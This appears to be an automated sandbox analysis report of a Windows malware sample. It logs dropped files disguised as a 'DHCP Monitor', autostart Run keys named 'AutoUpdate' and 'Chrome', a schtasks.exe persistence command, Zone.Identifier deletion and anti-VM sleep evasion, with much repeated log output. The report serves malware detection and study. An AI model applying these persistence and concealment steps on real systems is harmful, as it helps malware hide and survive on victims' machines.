        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

        Persistence and Installation Behavior:

        barindex
        Drops PE files with a suspicious file extensionShow sources
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeFile created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeFile created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifJump to dropped file
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file

        Boot Survival:

        barindex
        Creates multiple autostart registry keysShow sources
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
        Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Roaming\98025414\Update.vbsJump to behavior
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp8F04.tmp'
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM autoit scriptShow sources
        Source: Yara matchFile source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTR
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 6848Thread sleep count: 74 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 6848Thread sleep count: 123 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 4936Thread sleep count: 74 > 30Jump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 4936Thread sleep count: 104 > 30Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4400Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5316Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 5308Thread sleep count: 64 > 30
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 5308Thread sleep count: 109 > 30
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 4728Thread sleep count: 70 > 30
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif TID: 4728Thread sleep count: 114 > 30
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 3643Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 5873Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
